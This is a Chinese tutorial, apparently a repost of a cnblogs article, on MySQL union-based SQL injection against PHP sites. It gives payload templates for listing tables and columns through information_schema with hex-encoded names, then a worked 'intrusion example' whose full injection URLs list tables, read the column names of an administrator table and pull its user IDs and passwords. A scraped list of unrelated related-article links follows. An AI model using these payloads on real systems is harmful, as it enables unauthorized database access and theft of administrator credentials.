MySql数据库的版本够了,不需要暴力猜表的,而是“查”表

表可以爆了,出来了,字段出不来怎么办?其实字段也可以查出
查表段时的格式是:

  +union select 1,2,3,table_name from (select * from information_schema.tables where table_schema=数据库名字的hex order by table_schema limit 6,7)t limit 1--

那么,查字段的格式就是:

  +union select 1,2,column_name from (select * from information_schema.columns where table_name=爆出来的表名的hex值 and table_schema=数据库名的hex值 order by 1 limit 2,3)t limit 1--

与爆表类似

在最后一个limit 6,7很明显是范围,从0,1、1,2、2,3、3,4的这么查下去就可以了,直到查出来想要的表名

看一个入侵实例:
本帖隐藏的内容需要回复才可以浏览
爆表:

  http://site/newinfo.php?id=125+and+1=2+union+select+1,2,3,table_name,5,6,7,8,9,10+from+(select+*+from+information_schema.tables+where+table_schema=0x796B7873676F76+order+by+table_schema+limit+0,1)t+limit+1--

爆字:

http://site/jg_view.php?id=141+and+1=2+union+select+1,2,column_name,4,5+from+(select+*+from+information_schema.columns+where+table_name=0x61646D696E6973747261746F72+and+table_schema=0x796B7873676F76+order+by+1+limit+2,3)t+limit+1-- 

使用前面爆出来的:

  http://site/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,concat(uid,0x5f,pwd)+from+administrator

转载于:https://www.cnblogs.com/amwld/archive/2011/05/29/2061788.html

php+MySql注入非暴力爆字段名相关推荐

  1. php爆数据库,php+MySql注入非暴力爆数据库表段

    某群主发了一篇<php+MySql注入非暴力爆数据库表段>的科普,那样的都可以发,我只好也一起发科普了. Author:Juliet 科普: <php+MySql注入非暴力爆数据库表 ...

  2. Access注入偏移爆字段

    作者:莫良 0x01 此方法解决%90注入得到表得不到字段的网站,举动力文章为例子,它有28个字段,集合admin表5个字段,那么 union select 1,2,3,4,5,6,7,8,9,10, ...

  3. MyBatis + MyBatis Plus + MySQL——查询语句中字段名为MySQL关键字问题解决方案

    问题描述 ### Cause: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your ...

  4. mySql获取表的字段名,字段注释

    获取表的所有字段名: mySql安装成功后会默认存在mysql,test,information_schema这几个数据库. information_schema数据库中有一个名为COLUMNS的表, ...

  5. mysql查询表内所有字段名和备注

    select distinct column_name as 字段名,column_comment as 字段备注 from information_schema.columns where tabl ...

  6. MySql 获取表的字段名

    SHOW DATABASES //列出 MySQL Server 数据库. SHOW TABLES [FROM db_name] //列出数据库数据表. SHOW CREATE TABLES tbl_ ...

  7. Python 获取MySql某个表所有字段名

    在使用python导出数据库中数据的时候,往往除了插入的数据以外,还有表字段等信息需要导出,查阅了资料后发现了2种方法 第一种: 在mysql自带的表里查询,这个表保存了每张表的字段信息,可以用pym ...

  8. mysql 变量被引号括住_【已解决】mysql中操作表的字段名时是否一定要用反引号括起来...

    折腾: 期间,看到别人: 实现Pyspider爬虫结果的自定义ResultWorker – 简书    @staticmethod def escape(string): return '`%s`' ...

  9. mysql获取表的字段名称

    mysql获取表的字段名称 查询表的字段名. mysql怎么查询表的字段名 添加数据库名 原文: https://m.php.cn/article/490789.html 查询表的字段名. mysql ...

最新文章

  1. 聊聊服务治理中的路由设计
  2. linux fedora35安装kvm虚拟机命令整理
  3. word插入参考文献、目录及公式对齐方法
  4. [渝粤教育] 中国地质大学 国际贸易理论 复习题 (2)
  5. php 安装rabtmq amqp 扩展
  6. 问答丨如何理解哈希表的工作原理?
  7. Sql server 数据转到 Mysql 数据库
  8. Win10电脑如何查看本机mac地址
  9. Java_Arrays.fill() 初始化二维数组一个指定值
  10. 形态学滤波对图像进行边缘及角点检测
  11. Java Swing中国象棋AI(人机和人人对战)
  12. batchplot插件用法_batchplot插件怎么安装 batchplot插件安装教程
  13. 获取当前系统时间(取相对于系统时间的前一周时间)
  14. UVM_1:UVM介绍
  15. 将条码软件中的标签转化成PDF
  16. [ASP.NET] 结合Web API在OWIN下实现OAuth
  17. etcd集群搭建和使用中常见的报错信息(热key探测系列教程)
  18. Python环境搭建-自用
  19. Python合并PDF、操作图片以及生成验证码
  20. Jenkins Git Changelog Plugin

热门文章

  1. U盘快速​安装Ubuntu系统
  2. Windows 7 Beta(32位\64位)官方镜像文件下载
  3. 文档中没有介绍的SQL Server DBCC命令
  4. 创建android工程时Install Dependencies(安装依赖)提示
  5. springboot 权限管理 后台框架源码 java 项目 shiro FHAddmin
  6. SpringBoot—启动原理
  7. (五)Docker查看容器ip及指定固定IP
  8. Python操作SQLLite(基本操作)
  9. html 新append后的元素如何注册click
  10. ant+jmeter